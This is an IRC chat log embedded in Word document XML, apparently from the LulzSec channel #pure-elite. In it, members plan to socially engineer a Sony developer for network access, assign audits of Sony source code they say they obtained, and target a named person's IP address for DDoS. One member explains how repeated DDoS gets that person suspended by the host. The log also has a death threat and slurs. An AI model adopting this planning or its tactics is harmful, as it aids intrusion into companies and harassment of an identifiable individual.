          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:45:58 neuron some guy is saying he can donate a dual xeon to the cause Jun 02 17:45:59 neuron XD Jun 02 17:46:10 lol proberbly to log us tho Jun 02 17:46:24 storm lol: we wouldn't use Windows Jun 02 17:46:26 storm cakes Jun 02 17:46:32 storm :P Jun 02 17:46:43 neuron Sabu: I wouldn't suggest it just yet we could use more of his shit Jun 02 17:46:57 sabu what else is he offering?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:46:58 neuron hes a sony dev :P Jun 02 17:47:05 sabu you serious Jun 02 17:47:05 neuron if we keep quite we can get more Jun 02 17:47:07 sabu so tell him Jun 02 17:47:13 sabu to give us access into sony network Jun 02 17:47:41 neuron ill see he said he was a ex sony dev but has access Jun 02 17:47:43 storm social engineer him into that shit Jun 02 17:47:45 sabu ok Jun 02 17:47:46 sabu so Jun 02 17:47:47 sabu bro Jun 02 17:47:50 sabu what are you doing here talking to us Jun 02 17:47:52 sabu social his ass Jun 02 17:47:53 sabu haha Jun 02 17:47:58 neuron he logged off Jun 02 17:48:02 sabu gay Jun 02 17:48:03 neuron he will be on 2600 Jun 02 17:48:07 neuron idle later so ill talk Jun 02 17:48:08 sabu so he messaged you Jun 02 17:48:10 sabu gave you source Jun 02 17:48:12 sabu llogged off?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:50:05 trollpoll wow 228 users Jun 02 17:50:28 neuron yeah he likes us or something Jun 02 17:50:29 sabu I am about to join as brazil Jun 02 17:50:39 lol xD biggest chan on 2600 we've fully taken over xD Jun 02 17:51:18 trollpoll i've changed my ident, renew my tor address and changed my nick several times...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:51:55 sabu any 2600 admin come on sucking you dicks yet?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:53:13 Recursion also, any bitcoin donated?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:54:33 * Neuron has quit (Ping timeout: 121 seconds) Jun 02 17:54:54 joepie91 http://twitter.com/#!/search/sony Jun 02 17:54:56 joepie91 oops.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:55:01 joepie91 :D Jun 02 17:55:33 trollpoll i cant imagine the sony admin faces...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 17:55:45 * Neuron (Neuron@HA-96p.col.tt2aeb.IP) has joined #pure- elite Jun 02 17:56:56 * Neuron has quit (Quit: leaving) Jun 02 17:58:12 * Neuron (Neuron@HA-c7g.ftg.j06iiv.IP) has joined #pure- elite Jun 02 17:58:34 * Topiary has quit (Ping timeout: 121 seconds) Jun 02 18:00:07 neuron Need someone to op me Jun 02 18:00:16 joepie91 [01:58:59] fed | so, I want to play with you guys and this channel is like, gayer Jun 02 18:00:16 joepie91 than gay and full of newfags Jun 02 18:00:16 joepie91 [01:59:11] fed | wheres the real #lulzsec Jun 02 18:00:16 joepie91 [01:59:18] YouAreAPirate | Play in what sense? Jun 02 18:00:16 joepie91 [01:59:48] fed | you now what I mean Jun 02 18:00:16 joepie91 [01:59:55] egeste | know* Jun 02 18:00:18 neuron trollpoll: Topiary Jun 02 18:00:18 storm nick?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:00:20 neuron someone op Jun 02 18:00:21 joepie91 who wants to talk Jun 02 18:00:24 joepie91 also Jun 02 18:00:24 * pwnsauce gives channel operator status to Neuron Jun 02 18:00:28 pwnsauce haOpped Jun 02 18:00:28 trollpoll yep Jun 02 18:00:32 neuron CaptianJack Jun 02 18:00:34 joepie91 ok Jun 02 18:00:45 trollpoll i've no op Jun 02 18:00:48 joepie91 CaptainJack Jun 02 18:00:50 joepie91 on 2600 Jun 02 18:00:51 joepie91 is yo Jun 02 18:00:51 storm CaptianJack: No such nick/channel Jun 02 18:00:52 trollpoll and i dont want it Jun 02 18:00:53 joepie91 you* Jun 02 18:00:54 joepie91 right?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:01:20 neuron CaptainJack Jun 02 18:01:23 Recursion it took just about 1 hours to hit AP Jun 02 18:01:32 storm we have like Jun 02 18:01:33 storm dude Jun 02 18:01:35 Recursion hour, rather.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:01:36 storm more ppl in one room Jun 02 18:01:41 storm than this whole server had Jun 02 18:01:42 storm has* Jun 02 18:02:01 joepie91 Neuron Jun 02 18:02:04 joepie91 his name is egest Jun 02 18:02:06 joepie91 egeste* Jun 02 18:02:09 joepie91 he says you are not responding Jun 02 18:02:20 joepie91 [02:00:21] egeste | I know you guys don't know me, but you probably know people that do Jun 02 18:02:20 joepie91 [02:00:46] egeste | Xero, venuism, e, insidious, nigg, etc etc Jun 02 18:02:20 joepie91 [02:00:57] egeste | kayla Jun 02 18:02:40 trollpoll these nicks are very well known Jun 02 18:02:52 neuron haha Jun 02 18:03:10 sabu hes just name dropping Jun 02 18:03:11 neuron tell him to provide a 0day as proff and he can join Jun 02 18:03:12 neuron then ban him Jun 02 18:03:17 sabu kayla says that kid used to idle in gnosis Jun 02 18:03:19 sabu and not do shit Jun 02 18:03:38 joepie91 you talk to him Jun 02 18:03:39 joepie91 lol Jun 02 18:03:41 sabu guys get your social engineering games up Jun 02 18:03:44 sabu cause im starting to see some fails Jun 02 18:04:03 sabu is topiary on irc?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:04:07 sabu fuck Jun 02 18:04:09 joepie91 also, yes, I am talking differently on my alternate nick.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:04:59 Recursion Sabu: I'm not even saying a word, bud.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:03 Recursion just observing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:22 storm wow Jun 02 18:05:23 storm bro Jun 02 18:05:28 neuron ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:29 storm people are trying to down our ops Jun 02 18:05:35 joepie91 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:05:36 neuron ya think :P Jun 02 18:05:38 storm i just put my v6 client up Jun 02 18:05:44 storm v00d00 Jun 02 18:06:02 sabu 13:56:30.729325 IP smpp.uk.access.vodafone.net &gt; vps5890.lulz.net: ICMP echo request, id 30064, seq 4, length 64 Jun 02 18:06:02 sabu 13:56:30.729360 IP vps5890.lulz.net &gt; smpp.uk.access.vodafone.net: ICMP echo reply, id 30064, seq 4, length 64 Jun 02 18:06:03 Recursion inbeforebotnetjoins Jun 02 18:06:07 sabu someone from vodaphones pinging us Jun 02 18:06:14 joepie91 lol Jun 02 18:06:15 sabu 13:56:50.228857 IP 64-46-16- 105.dyn.novuscom.net.isakmp &gt; vps5890.lulz.net.isakmp: isakmp: phase 1 I #243 Jun 02 18:06:15 sabu 13:56:50.228886 IP vps5890.lulz.net &gt; 64-46-16- 105.dyn.novuscom.net: ICMP vps5890.lulz.net udp port isakmp unreachable, length 376 Jun 02 18:06:20 sabu people scanning us Jun 02 18:06:22 sabu lol Jun 02 18:06:23 neuron yeah im getting hit Jun 02 18:06:26 sabu im watcinhg tcpdump hard Jun 02 18:06:27 neuron scan my vm?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:06:32 joepie91 I am not getting hit it seems Jun 02 18:06:33 joepie91 odd Jun 02 18:06:33 trollpoll in other way of things, do you really think that tor is compromised? i mean, i know that many tor servers are CIA servers, but this doesnt mean nothing... except a mitm... but they had to know who is gonna connect before connect... or do a mitm to everyone...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:06:33 storm no scanning Jun 02 18:06:39 storm open up tcpdump Jun 02 18:06:41 storm and do Jun 02 18:06:43 storm -i eth0 Jun 02 18:06:50 joepie91 or maybe I am.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:06:56 sabu tor is not trustable Jun 02 18:07:05 sabu please dont use for anything other than random site visitng Jun 02 18:07:07 joepie91 is it bad my host is so shitty I can't tell whether I am getting hit? :/ Jun 02 18:07:09 trollpoll just because the rsa affair?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:07:12 Recursion we gotta get off that server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:07:18 neuron were getting hit Jun 02 18:07:24 Recursion the IRC server Jun 02 18:07:25 sabu neuron Jun 02 18:07:27 sabu so sign off?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:07:29 sabu look Jun 02 18:07:31 storm Sabu Jun 02 18:07:31 sabu guys Jun 02 18:07:34 neuron lol i just hopped onto another ip Jun 02 18:07:35 sabu neuron Jun 02 18:07:37 * Topiary (t@HA-s05.rkn.75e5ku.IP) has joined #pure-elite Jun 02 18:07:39 storm I use tor to connect to my ddos boxen Jun 02 18:07:40 sabu recursion etc Jun 02 18:07:40 storm ;x Jun 02 18:07:46 Recursion yup yup Jun 02 18:08:06 sabu if youre going to be in there its for research purposes Jun 02 18:08:13 joepie91 not getting hit here :/ Jun 02 18:09:04 trollpoll Sabu, im using tor right now...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:09:04 joepie91 ohey Jun 02 18:09:08 joepie91 Ryan is on 2600 Jun 02 18:09:09 storm te whole room is hit Jun 02 18:09:13 storm the* Jun 02 18:09:17 storm hes hitting random ppl Jun 02 18:09:22 joepie91 ~b@vps.anon.su Jun 02 18:09:23 joepie91 [02:07:22] xxxx | hi kayla or sabu or tflow Jun 02 18:09:25 joepie91 Ryan Jun 02 18:09:28 neuron lul Jun 02 18:09:30 Recursion I'm out of there Jun 02 18:09:40 storm why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:09:41 storm lol Jun 02 18:09:44 storm it's funny Jun 02 18:09:44 storm xD Jun 02 18:09:51 storm set up ipv6 Jun 02 18:09:51 joepie91 what should I say to Ryan?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:09:56 storm they obviously cant hit it Jun 02 18:09:56 Topiary &lt;laurelai&gt; nicely done Jun 02 18:10:01 storm 22:09 &lt;xxxx&gt; hi kayla or sabu Jun 02 18:10:06 storm he pmed me Jun 02 18:10:07 storm rofl Jun 02 18:10:08 neuron lul Jun 02 18:10:13 neuron same Jun 02 18:10:14 Topiary [Laurelai] (~Laurelai@205.185.113.6): Laurela Jun 02 18:10:18 joepie91 lol Jun 02 18:10:18 Topiary Laurelai leaked our logs Jun 02 18:10:19 neuron gonna say im awinee Jun 02 18:10:19 Topiary storm Jun 02 18:10:38 joepie91 uh Jun 02 18:10:40 joepie91 Topiary Jun 02 18:10:40 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:10:43 joepie91 that is a Frantech IP Jun 02 18:10:48 Topiary FIREFIREFIREFIRE Jun 02 18:10:52 Topiary FUCK YOU FRANTECH\111 Jun 02 18:10:52 joepie91 DDoS it Jun 02 18:10:54 sabu everybody stfu Jun 02 18:10:54 joepie91 it will disappear Jun 02 18:10:55 storm ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:10:56 joepie91 in a few minutes Jun 02 18:10:56 sabu EVERYONE Jun 02 18:10:57 sabu STFU Jun 02 18:11:02 sabu relax Jun 02 18:11:06 sabu as for ryan Jun 02 18:11:13 sabu ignore him Jun 02 18:11:16 sabu he doesnt know its us Jun 02 18:11:18 sabu jesus Jun 02 18:11:27 joepie91 relax :P Jun 02 18:11:30 trollpoll i left 2600...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:11:36 Topiary Ryan huh?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:11:36 sabu ok.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:11:39 storm you guys are ridiculous xD Jun 02 18:11:43 trollpoll the situation is getting horrible stressing Jun 02 18:11:43 sabu I know jesus Jun 02 18:11:46 sabu look Jun 02 18:11:49 sabu from now on Jun 02 18:12:05 sabu no one goes on 2600 unless you prep yourselfl for the social engineering Jun 02 18:12:11 sabu if you dont know how to social engineer do not get on 2600 Jun 02 18:12:17 sabu if you do not have a ddos protected ip Jun 02 18:12:20 sabu do not get on 2600 Jun 02 18:12:23 sabu thats it Jun 02 18:12:28 storm Jun 02 18:12:29 neuron Aye Jun 02 18:12:30 storm exactly it Jun 02 18:12:32 storm and Jun 02 18:12:34 storm for starters Jun 02 18:12:35 joepie91 it's not ddos protected, but disposable nevertheless :P Jun 02 18:12:40 storm ill give anyone an ipv6 shell Jun 02 18:12:42 storm straight up Jun 02 18:12:42 Recursion aye-aye, storm Jun 02 18:12:46 storm cause i love you guys Jun 02 18:12:46 Recursion err Jun 02 18:12:47 storm :D Jun 02 18:12:47 Recursion Sabu: Jun 02 18:12:51 trollpoll hahaha Jun 02 18:12:54 sabu yes Jun 02 18:13:07 Recursion I meant to say, aye-aye Sabu , not storm Jun 02 18:13:09 Recursion muhbad.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:13:11 sabu ok Jun 02 18:13:11 storm lol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:13:18 sabu sony was leaked Jun 02 18:13:22 sabu we got bigger projects Jun 02 18:13:37 sabu atm neuron has access to source code to scedev.net socny dev team Jun 02 18:13:38 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-elite Jun 02 18:13:41 sabu how about those who are not busy Jun 02 18:13:42 joepie91 Topiary: just a tip, Frantech has an automated nullrouting system in place. If you DDoS Laurelais IP, he will disappear from the internet for a while, and if you keep doing it he will be booted from their service.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:13:49 sabu work on auditing that src Jun 02 18:14:02 Topiary I'm off to bed in a few Jun 02 18:14:04 sabu storm, hear that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:14:08 sabu drop that ip Jun 02 18:14:08 storm sup?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:14:10 neuron Im on it currently talking to more people Jun 02 18:14:15 sabu Topiary [Laurelai] (~Laurelai@205.185.113.6): Laurela Jun 02 18:14:20 storm ok gimme a few Jun 02 18:14:22 storm rebooting Jun 02 18:14:22 sabu kk Jun 02 18:14:24 sabu now Jun 02 18:14:25 Topiary Laurelai was the one who compromised our HBGay logs Jun 02 18:14:29 Topiary so yes Jun 02 18:14:29 storm im on doze Jun 02 18:14:31 joepie91 it'll get nullrouted for ~1 hour at first I believe Jun 02 18:14:36 joepie91 after a few nullroutes he will get suspended Jun 02 18:14:37 joepie91 :) Jun 02 18:14:44 storm rebooting now Jun 02 18:15:32 &lt;palladium&gt; Hi everyone!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:15:46 neuron 0-0 o/ Jun 02 18:16:00 neuron HI! who are you and whats your posion?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:16:46 neuron For funzies Topiary: we have a IAMA request on reddit if your intrested Jun 02 18:16:58 joepie91 - CrazyD quit (Quit: Sure is #ifeds) Jun 02 18:17:00 joepie91 lolwut Jun 02 18:17:08 Topiary what's that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:17:19 Topiary @ Neuron Jun 02 18:17:24 neuron a IAMA Jun 02 18:17:31 neuron basically a Qand A session on reddit Jun 02 18:17:39 neuron were redditors ask questions an you answer Jun 02 18:18:00 sabu wait Jun 02 18:18:06 sabu you guys started a iama on reddit?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:18:49 Recursion ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:19:00 sabu I will go to your homes and kill you.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:19:10 storm yo Jun 02 18:19:13 Recursion Neuron: are you serious?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:19:17 sabu if you really started an iama bro Jun 02 18:19:24 sabu you really dont understand what we are about here Jun 02 18:19:51 kl0ps ok guys, i have to go to bed. see you tomorrow. btw lulzsec is so funny :D ... love ya Jun 02 18:19:54 kl0ps gn8 Jun 02 18:20:03 storm night Jun 02 18:20:06 sabu goodnight kl0ps Jun 02 18:20:06 Recursion g'night Jun 02 18:20:14 Recursion Neuron Jun 02 18:20:15 * kl0ps has quit (Quit: Leaving) Jun 02 18:20:17 Recursion ffs Jun 02 18:20:50 sabu I dont see it Jun 02 18:21:08 trollpoll Sabu, mmm, what do you think about doing some "tutorials" on how to act, how to protect ourselves, etc...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:21:16 trollpoll something quick and dirty Jun 02 18:21:43 sabu I think so Jun 02 18:21:44 Topiary let's not do a Q&amp;A with Reddit Jun 02 18:21:57 sabu I thought all this stuff was common knowledge Jun 02 18:22:04 Recursion we shouldn't interface with the public any more than we have to Jun 02 18:22:12 Topiary twitter is enough Jun 02 18:22:21 Topiary our formspring was dumb so I stopped answering questions weeks ago Jun 02 18:22:23 Recursion indeed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:22:32 storm Sabu Jun 02 18:22:40 storm I have to leave can you keep that IP for later? Jun 02 18:22:42 * Sabu has changed the topic to: pE | NO LEAKS | NO MEDIA | Talk to Sabu OR Topiary if unsure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:22:48 sabu yup save it for later Jun 02 18:22:51 storm OK Jun 02 18:22:53 storm good game.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:22:55 sabu muah Jun 02 18:23:03 storm I gotta go to that thing we talk about from time to time Jun 02 18:23:04 storm ;) Jun 02 18:23:07 storm I'll be back Jun 02 18:23:10 joepie91 fap?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:14 storm text me if shit gets knocked you feel me?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:15 storm na Jun 02 18:23:15 trollpoll sure fap Jun 02 18:23:15 joepie91 :P Jun 02 18:23:25 storm btw Jun 02 18:23:31 storm people are dropping the ipv6 server Jun 02 18:23:31 joepie91 fap. always fap.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:23:37 storm they want us to be opless.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
